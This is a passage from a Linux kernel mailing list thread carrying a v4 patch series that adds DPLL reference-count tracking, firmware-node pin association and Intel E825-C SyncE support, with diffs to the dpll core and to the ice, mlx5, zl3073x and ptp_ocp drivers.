OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } } dpll_device_unregister(bp->dpll, &dpll_ops, bp); - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 8fff048131f1d..5c80cdab0c180 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -18,6 +18,7 @@ struct dpll_device; 
struct dpll_pin; struct dpll_pin_esync; struct fwnode_handle; +struct ref_tracker; struct dpll_device_ops { int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv, @@ -173,6 +174,12 @@ struct dpll_pin_properties { u32 phase_gran; }; +#ifdef CONFIG_DPLL_REFCNT_TRACKER +typedef struct ref_tracker *dpll_tracker; +#else +typedef struct {} dpll_tracker; +#endif + #define DPLL_DEVICE_CREATED 1 #define DPLL_DEVICE_DELETED 2 #define DPLL_DEVICE_CHANGED 3 @@ -205,7 +212,8 @@ size_t dpll_netdev_pin_handle_size(const struct net_device *dev); int dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev); -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode); +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker); #else static inline void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin) { } @@ -223,16 +231,17 @@ dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev) } static inline struct dpll_pin * -fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +fwnode_dpll_pin_find(struct fwnode_handle *fwnode, dpll_tracker *tracker) { return NULL; } #endif struct dpll_device * -dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module); +dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module, + dpll_tracker *tracker); -void dpll_device_put(struct dpll_device *dpll); +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker); int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, const struct dpll_device_ops *ops, void *priv); @@ -244,7 +253,7 @@ void dpll_device_unregister(struct dpll_device *dpll, struct dpll_pin * dpll_pin_get(u64 clock_id, u32 dev_driver_id, struct module *module, - const struct dpll_pin_properties *prop); + const struct dpll_pin_properties *prop, dpll_tracker *tracker); int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv);
@@ -252,7 +261,7 @@ int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); -void dpll_pin_put(struct dpll_pin *pin); +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker); void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:36 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
Update existing DPLL drivers to utilize the DPLL reference count tracking infrastructure. Add dpll_tracker fields to the drivers' internal device and pin structures. Pass pointers to these trackers when calling dpll_device_get/put() and dpll_pin_get/put(). This allows developers to inspect the specific references held by this driver via debugfs when CONFIG_DPLL_REFCNT_TRACKER is enabled, aiding in the debugging of resource leaks. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/dpll.c | 14 ++++++++------ drivers/dpll/zl3073x/dpll.h | 2 ++ drivers/net/ethernet/intel/ice/ice_dpll.c | 15 ++++++++------- drivers/net/ethernet/intel/ice/ice_dpll.h | 4 ++++ drivers/net/ethernet/mellanox/mlx5/core/dpll.c | 15 +++++++++------ drivers/ptp/ptp_ocp.c | 17 ++++++++++------- 6 files changed, 41 insertions(+), 26 deletions(-) diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 8788bcab7ec53..a99d143a7acde 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -29,6 +29,7 @@ * @list: this DPLL pin list entry * @dpll: DPLL the pin is registered to * @dpll_pin: pointer to registered dpll_pin + * @tracker: tracking object for the acquired reference * @label: package label * @dir: pin direction * @id: pin id @@ -44,6 +45,7 @@ struct zl3073x_dpll_pin { struct list_head list; struct zl3073x_dpll *dpll; struct dpll_pin *dpll_pin; + dpll_tracker tracker; char label[8]; enum dpll_pin_direction dir; u8 id; @@ -1480,7 +1482,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props, NULL); + &props->dpll_props, &pin->tracker); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1505,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - 
dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1536,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); pin->dpll_pin = NULL; } @@ -1708,7 +1710,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE, NULL); + THIS_MODULE, &zldpll->tracker); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1722,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } @@ -1743,7 +1745,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } diff --git a/drivers/dpll/zl3073x/dpll.h b/drivers/dpll/zl3073x/dpll.h index e8c39b44b356c..c65c798c37927 100644 --- a/drivers/dpll/zl3073x/dpll.h +++ b/drivers/dpll/zl3073x/dpll.h @@ -18,6 +18,7 @@ * @check_count: periodic check counter * @phase_monitor: is phase offset monitor enabled * @dpll_dev: pointer to registered DPLL device + * @tracker: tracking object for the acquired reference * @lock_status: last saved DPLL lock status * @pins: list of pins * @change_work: device change notification work @@ -31,6 +32,7 @@ struct zl3073x_dpll { u8 check_count; bool phase_monitor; struct dpll_device *dpll_dev; + dpll_tracker tracker; enum dpll_lock_status lock_status; struct list_head pins; struct 
work_struct change_work; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 64b7b045ecd58..4eca62688d834 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop, NULL); + &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - dpll_pin_put(rclk->pin, NULL); + dpll_pin_put(rclk->pin, &rclk->tracker); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); } /** @@ -3271,7 +3271,8 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, + &d->tracker); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3288,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, 
type, ops, d); if (ret) { - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index c0da03384ce91..63fac6510df6e 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -23,6 +23,7 @@ enum ice_dpll_pin_sw { /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin + * @tracker: reference count tracker * @idx: ice pin private idx * @num_parents: hols number of parent pins * @parent_idx: hold indexes of parent pins @@ -37,6 +38,7 @@ enum ice_dpll_pin_sw { struct ice_dpll_pin { struct dpll_pin *pin; struct ice_pf *pf; + dpll_tracker tracker; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -58,6 +60,7 @@ struct ice_dpll_pin { /** ice_dpll - store info required for DPLL control * @dpll: pointer to dpll dev * @pf: pointer to pf, which has registered the dpll_device + * @tracker: reference count tracker * @dpll_idx: index of dpll on the NIC * @input_idx: currently selected input index * @prev_input_idx: previously selected input index @@ -76,6 +79,7 @@ struct ice_dpll_pin { struct ice_dpll { struct dpll_device *dpll; struct ice_pf *pf; + dpll_tracker tracker; u8 dpll_idx; u8 input_idx; u8 prev_input_idx; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 541d83e5d7183..3981dd81d4c17 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -9,7 +9,9 @@ */ struct mlx5_dpll { struct dpll_device *dpll; + dpll_tracker dpll_tracker; struct dpll_pin *dpll_pin; + dpll_tracker pin_tracker; struct mlx5_core_dev *mdev; struct workqueue_struct *wq; struct delayed_work work; @@ -438,7 +440,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); 
/* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, + &mdpll->dpll_tracker); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -452,7 +455,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), THIS_MODULE, &mlx5_dpll_pin_properties, - NULL); + &mdpll->pin_tracker); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -480,11 +483,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); err_free_mdpll: kfree(mdpll); return err; @@ -500,9 +503,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index f39b3966b3e8c..1b16a9c3d7fdc 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -285,6 +285,7 @@ struct ptp_ocp_sma_connector { u8 default_fcn; struct dpll_pin *dpll_pin; struct dpll_pin_properties dpll_prop; + dpll_tracker tracker; }; struct ocp_attr_group 
{ @@ -383,6 +384,7 @@ struct ptp_ocp { struct ptp_ocp_sma_connector sma[OCP_SMA_NUM]; const struct ocp_sma_op *sma_op; struct dpll_device *dpll; + dpll_tracker tracker; int signals_nr; int freq_in_nr; }; @@ -4788,7 +4790,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, &bp->tracker); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4801,7 +4803,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) for (i = 0; i < OCP_SMA_NUM; i++) { bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, - &bp->sma[i].dpll_prop, NULL); + &bp->sma[i].dpll_prop, + &bp->sma[i].tracker); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4810,7 +4813,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); goto out_dpll; } } @@ -4820,9 +4823,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); out: ptp_ocp_detach(bp); out_disable: @@ -4843,11 +4846,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } } dpll_device_unregister(bp->dpll, &dpll_ops, 
bp); - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:37 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel
E825-C Ethernet controller. Unlike previous generations, where DPLL
connections were implicitly assumed, the E825-C architecture relies on the
platform firmware (ACPI) to describe the physical connections between the
Ethernet controller and external DPLLs (such as the ZL3073x). To
accommodate this, the series extends the DPLL subsystem to support firmware
node (fwnode) associations, asynchronous discovery via notifiers, and
dynamic pin management. Additionally, a significant refactor of the DPLL
reference counting logic is included to improve robustness and
debuggability.

DPLL Core Extensions:
* Firmware Node Association: Pins can now be associated with a
  struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This
  allows drivers to link pin objects with their corresponding DT/ACPI
  nodes.
* Asynchronous Notifiers: A raw notifier chain is added to the DPLL core.
  This allows the Ethernet driver to subscribe to events and react when
  the platform DPLL driver registers the parent pins, resolving probe
  ordering dependencies.
* Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have
  the core automatically allocate a unique pin index.

Reference Counting & Debugging:
* Refactor: The reference counting logic in the core is consolidated.
  Internal list management helpers now automatically handle hold/put
  operations, removing fragile open-coded logic in the registration paths.
* Reference Tracking: A new Kconfig option, DPLL_REFCNT_TRACKER, allows
  developers to instrument and debug reference leaks by recording stack
  traces for every get/put operation.

Driver Updates:
* zl3073x: Updated to associate pins with fwnode handles using the new
  setter and to support the 'mux' pin type.
* ice: Implements the E825-C specific hardware configuration for SyncE
  (CGU registers). It uses the new notifier and fwnode APIs to dynamically
  discover and attach to the platform DPLLs.
Patch Summary:
Patch 1: DPLL Core (fwnode association).
Patch 2: Driver zl3073x (Set fwnode).
Patch 3-4: DPLL Core (Notifiers and dynamic IDs).
Patch 5: Driver zl3073x (Mux type).
Patch 6: DPLL Core (Refcount refactor).
Patch 7-8: Refcount tracking infrastructure and driver updates.
Patch 9: Driver ice (E825-C SyncE logic).

Changes in v4:
* Fixed documentation and function stub issues found by AI

Arkadiusz Kubalewski (1):
  ice: dpll: Support E825-C SyncE and dynamic pin discovery

Ivan Vecera (7):
  dpll: Allow associating dpll pin with a firmware node
  dpll: zl3073x: Associate pin with fwnode handle
  dpll: Support dynamic pin index allocation
  dpll: zl3073x: Add support for mux pin type
  dpll: Enhance and consolidate reference counting logic
  dpll: Add reference count tracking support
  drivers: Add support for DPLL reference count tracking

Petr Oros (1):
  dpll: Add notifier chain for dpll events

 drivers/dpll/Kconfig                        |  15 +
 drivers/dpll/dpll_core.c                    | 288 ++
 drivers/dpll/dpll_core.h                    |  11 +
 drivers/dpll/dpll_netlink.c                 |   6 +
 drivers/dpll/zl3073x/dpll.c                 |  15 +-
 drivers/dpll/zl3073x/dpll.h                 |   2 +
 drivers/dpll/zl3073x/prop.c                 |   2 +
 drivers/net/ethernet/intel/ice/ice_dpll.c   | 755 +++++++++++++++---
 drivers/net/ethernet/intel/ice/ice_dpll.h   |  30 +
 drivers/net/ethernet/intel/ice/ice_lib.c    |   3 +
 drivers/net/ethernet/intel/ice/ice_ptp.c    |  32 +
 drivers/net/ethernet/intel/ice/ice_ptp_hw.c |   9 +-
 drivers/net/ethernet/intel/ice/ice_tspll.c  | 217 +++++
 drivers/net/ethernet/intel/ice/ice_tspll.h  |  13 +-
 drivers/net/ethernet/intel/ice/ice_type.h   |   6 +
 .../net/ethernet/mellanox/mlx5/core/dpll.c  |  16 +-
 drivers/ptp/ptp_ocp.c                       |  18 +-
 include/linux/dpll.h                        |  59 +-
 18 files changed, 1347 insertions(+), 150 deletions(-)

--
2.52.0
From: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com>

Implement SyncE support for the E825-C Ethernet controller using the DPLL
subsystem. Unlike E810, the E825-C architecture relies on platform
firmware (ACPI) to describe connections between the NIC's recovered clock
outputs and external DPLL inputs.

Implement the following mechanisms to support this architecture:

1. Discovery Mechanism: The driver parses the 'dpll-pins' and
   'dpll-pin-names' firmware properties to identify the external DPLL pins
   (parents) corresponding to its RCLK outputs ("rclk0", "rclk1"). It uses
   fwnode_dpll_pin_find() to locate these parent pins in the DPLL core.

2. Asynchronous Registration: Since the platform DPLL driver (e.g.
   zl3073x) may probe independently of the network driver, utilize the
   DPLL notifier chain. The driver listens for DPLL_PIN_CREATED events to
   detect when the parent MUX pins become available, then registers its
   own Recovered Clock (RCLK) pins as children of those parents.

3. Hardware Configuration: Implement the register access logic specific to
   the E825-C CGU (Clock Generation Unit) registers (R10, R11). This
   includes configuring the bypass MUXes and clock dividers required to
   drive SyncE signals.

4. Split Initialization: Refactor ice_dpll_init() to separate the static
   initialization path of E810 from the dynamic, firmware-driven path
   required for E825-C.
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
Co-developed-by: Ivan Vecera <ivecera@redhat.com>
Signed-off-by: Ivan Vecera <ivecera@redhat.com>
Co-developed-by: Grzegorz Nitka <grzegorz.nitka@intel.com>
Signed-off-by: Grzegorz Nitka <grzegorz.nitka@intel.com>
Signed-off-by: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com>
---
v3:
* DPLL init check in ice_ptp_link_change()
* using completion for dpll initialization to avoid races with DPLL
  notifier scheduled works
* added parsing of dpll-pin-names and dpll-pins properties
v2:
* fixed error path in ice_dpll_init_pins_e825()
* fixed misleading comment referring 'device tree'
---
 drivers/net/ethernet/intel/ice/ice_dpll.c   | 742 +++++++++++++++++---
 drivers/net/ethernet/intel/ice/ice_dpll.h   |  26 +
 drivers/net/ethernet/intel/ice/ice_lib.c    |   3 +
 drivers/net/ethernet/intel/ice/ice_ptp.c    |  32 +
 drivers/net/ethernet/intel/ice/ice_ptp_hw.c |   9 +-
 drivers/net/ethernet/intel/ice/ice_tspll.c  | 217 ++++++
 drivers/net/ethernet/intel/ice/ice_tspll.h  |  13 +-
 drivers/net/ethernet/intel/ice/ice_type.h   |   6 +
 8 files changed, 956 insertions(+), 92 deletions(-)

diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 4eca62688d834..a8c99e49bfae6 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -5,6 +5,7 @@ #include "ice_lib.h" #include "ice_trace.h" #include <linux/dpll.h> +#include <linux/property.h> #define ICE_CGU_STATE_ACQ_ERR_THRESHOLD 50 #define ICE_DPLL_PIN_IDX_INVALID 0xff @@ -528,6 +529,92 @@ ice_dpll_pin_disable(struct ice_hw *hw, struct ice_dpll_pin *pin, return ret; } +/** + * ice_dpll_pin_store_state - updates the state of pin in SW bookkeeping + * @pin: pointer to a pin + * @parent: parent pin index + * @state: pin state (connected or disconnected) + */ +static void +ice_dpll_pin_store_state(struct ice_dpll_pin *pin, int parent, bool state) +{ + pin->state[parent] = state ?
DPLL_PIN_STATE_CONNECTED : + DPLL_PIN_STATE_DISCONNECTED; +} + +/** + * ice_dpll_rclk_update_e825c - updates the state of rclk pin on e825c device + * @pf: private board struct + * @pin: pointer to a pin + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update_e825c(struct ice_pf *pf, + struct ice_dpll_pin *pin) +{ + u8 rclk_bits; + int err; + u32 reg; + + if (pf->dplls.rclk.num_parents > ICE_SYNCE_CLK_NUM) + return -EINVAL; + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R10, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK0, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R11, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK1, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + return 0; +} + +/** + * ice_dpll_rclk_update - updates the state of rclk pin on a device + * @pf: private board struct + * @pin: pointer to a pin + * @port_num: port number + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update(struct ice_pf *pf, struct ice_dpll_pin *pin, + u8 port_num) +{ + int ret; + + for (u8 parent = 0; parent < pf->dplls.rclk.num_parents; parent++) { + ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &parent, &port_num, + &pin->flags[parent], NULL); + if (ret) + return ret; + + ice_dpll_pin_store_state(pin, parent, + ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & + pin->flags[parent]); + } + + return 0; +} + /** * ice_dpll_sw_pins_update - update status of all SW pins * @pf: private board struct @@ -668,22 
+755,14 @@ ice_dpll_pin_state_update(struct ice_pf *pf, struct ice_dpll_pin *pin, } break; case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - for (parent = 0; parent < pf->dplls.rclk.num_parents; - parent++) { - u8 p = parent; - - ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &p, - &port_num, - &pin->flags[parent], - NULL); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) { + ret = ice_dpll_rclk_update_e825c(pf, pin); + if (ret) + goto err; + } else { + ret = ice_dpll_rclk_update(pf, pin, port_num); if (ret) goto err; - if (ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & - pin->flags[parent]) - pin->state[parent] = DPLL_PIN_STATE_CONNECTED; - else - pin->state[parent] = - DPLL_PIN_STATE_DISCONNECTED; } break; case ICE_DPLL_PIN_TYPE_SOFTWARE: @@ -1842,6 +1921,40 @@ ice_dpll_phase_offset_get(const struct dpll_pin *pin, void *pin_priv, return 0; } +/** + * ice_dpll_synce_update_e825c - setting PHY recovered clock pins on e825c + * @hw: Pointer to the HW struct + * @ena: true if enable, false in disable + * @port_num: port number + * @output: output pin, we have two in E825C + * + * DPLL subsystem callback. Set proper signals to recover clock from port. 
+ * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +static int ice_dpll_synce_update_e825c(struct ice_hw *hw, bool ena, + u32 port_num, enum ice_synce_clk output) +{ + int err; + + /* configure the mux to deliver proper signal to DPLL from the MUX */ + err = ice_tspll_cfg_bypass_mux_e825c(hw, ena, port_num, output); + if (err) + return err; + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, output); + if (err) + return err; + + dev_dbg(ice_hw_to_dev(hw), "CLK_SYNCE%u recovered clock: pin %s\n", + output, str_enabled_disabled(ena)); + + return 0; +} + /** * ice_dpll_output_esync_set - callback for setting embedded sync * @pin: pointer to a pin @@ -2263,6 +2376,28 @@ ice_dpll_sw_input_ref_sync_get(const struct dpll_pin *pin, void *pin_priv, state, extack); } +static int +ice_dpll_pin_get_parent_num(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int i; + + for (i = 0; i < pin->num_parents; i++) + if (pin->pf->dplls.inputs[pin->parent_idx[i]].pin == parent) + return i; + + return -ENOENT; +} + +static int +ice_dpll_pin_get_parent_idx(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int num = ice_dpll_pin_get_parent_num(pin, parent); + + return num < 0 ? 
num : pin->parent_idx[num]; +} + /** * ice_dpll_rclk_state_on_pin_set - set a state on rclk pin * @pin: pointer to a pin @@ -2286,35 +2421,44 @@ ice_dpll_rclk_state_on_pin_set(const struct dpll_pin *pin, void *pin_priv, enum dpll_pin_state state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; bool enable = state == DPLL_PIN_STATE_CONNECTED; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; + struct ice_hw *hw; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; + + hw = &pf->hw; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; if ((enable && p->state[hw_idx] == DPLL_PIN_STATE_CONNECTED) || (!enable && p->state[hw_idx] == 